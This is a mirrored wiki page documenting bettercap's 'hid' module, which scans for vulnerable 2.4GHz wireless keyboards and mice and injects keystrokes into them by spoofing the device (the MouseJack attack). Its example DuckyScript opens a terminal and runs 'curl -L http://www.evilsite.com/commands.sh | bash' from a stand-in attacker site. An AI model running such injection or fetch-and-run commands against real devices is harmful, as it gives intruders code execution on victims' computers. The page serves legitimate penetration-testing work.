mirror of
https://github.com/bettercap/bettercap.git
synced 2024-11-23 05:50:09 -08:00
Page:
hid
Pages
Caplets
Changing the Prompt
Compilation on Android
Compilation on Linux and macOS
Compilation on Windows
Cross Compilation ( ARM example )
Home
Interactive Mode
Known Issues
Using with Docker
any.proxy
api.rest
arp.spoof
ble
caplets.update
dhcp6.spoof
dns.spoof
events.stream
gps
hid
http.modules
http.proxy
http.server
https.proxy
https.server
mac.changer
mysql.server
net.probe
net.recon
net.sniff
packet.proxy
syn.scan
tcp.modules
tcp.proxy
ticker
update.check
wifi
wol
3
hid
evilsocket edited this page 2019-02-21 14:40:55 +01:00
This module, which is a port of Bastille's mousejack attack, performs scanning and frames injection module for HID devices on the 2.4Ghz spectrum, using Nordic Semiconductor nRF24LU1+ based USB dongles and Bastille's RFStorm firmware.
The module will work with one of the devices supported by RFStorm:
- CrazyRadio PA USB dongle
- SparkFun nRF24LU1+ breakout board
- Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)
And it is known to support detection and DuckyScript injection for the following devices:
- Microsoft Wireless Keyboard 800
- Microsoft Wireless Mouse 1000
- Microsoft Wireless Mobile Mouse 3500
- Microsoft All-In-One Media Keyboard
- Microsoft Sculpt Ergonomic Mouse
- Logitech Wireless Touch Keyboard K400r
- Logitech Marathon M705 Mouse
- Logitech Wave M510 Mouse
- Logitech Wireless Gaming Mouse G700s
- Logitech Wireless M325 Mouse
- Logitech K750 Wireless Keyboard
- Logitech K320 Wireless Keyboard
- Dell KM636 Wireless Mouse and Keyboard
- AmazonBasics MG-0975 Wireless Mouse
Commands
| command | description |
|---|---|
hid.recon on |
Start scanning for HID devices on the 2.4Ghz spectrum. |
hid.recon off |
Stop scanning for HID devices on the 2.4Ghz spectrum. |
hid.show |
Show a list of detected HID devices on the 2.4Ghz spectrum. |
hid.sniff ADDRESS |
Start sniffing a specific ADDRESS in order to collect payloads, use 'clear' to stop collecting. |
hid.inject ADDRESS LAYOUT FILENAME |
Parse the DuckyScript FILENAME and inject it as HID frames spoofing the device ADDRESS, using the LAYOUT keyboard mapping (available layouts: BE BR CA CH DE DK ES FI FR GB HR IT NO PT RU SI SV TR US). |
Parameters
| parameter | default | description |
|---|---|---|
hid.lna |
true |
If true, enable the LNA power amplifier for CrazyRadio devices. |
hid.hop.period |
100 |
Time in milliseconds to stay on each channel before hopping to the next one. |
hid.ping.period |
100 |
Time in milliseconds to attempt to ping a device on a given channel while in sniffer mode. |
hid.sniff.period |
500 |
Time in milliseconds to automatically sniff payloads from a device, once it's detected, in order to determine its type. |
hid.show.filter |
Defines a regular expression filter for hid.show. |
|
hid.show.sort |
mac desc |
Defines sorting field (mac, seen) and direction (asc or desc) for hid.show. |
hid.show.limit |
0 |
Defines limit for hid.show. |
Examples
Enable HID discovery, use the ticker module to display detected devices, wait for the device 32:26:9f:a4:08 to be detected and inject the ducky.txt script as HID frames using the US keyboard layout:
> set ticker.commands clear; hid.show; events.show 10
> hid.recon on
> ticker on
... wait for the device to be detected, using hid.show ...
> hid.inject 32:26:9f:a4:08 US ducky.txt
Example ducky.txt (for a complete list of available commands see the documentation:
GUI SPACE
DELAY 200
STRING Terminal
ENTER
DELAY 500
STRING curl -L http://www.evilsite.com/commands.sh | bash
ENTER
- Known Issues
- Using with Docker
- Compilation
- Interactive Mode and Command Line Arguments
- Changing the Prompt
- Caplets
Modules
- Core
- HID on 2.4Ghz (mousejacking)
- Bluetooth Low Energy
- 802.11
- Ethernet and IP
- Servers
- Rogue Servers
- Utils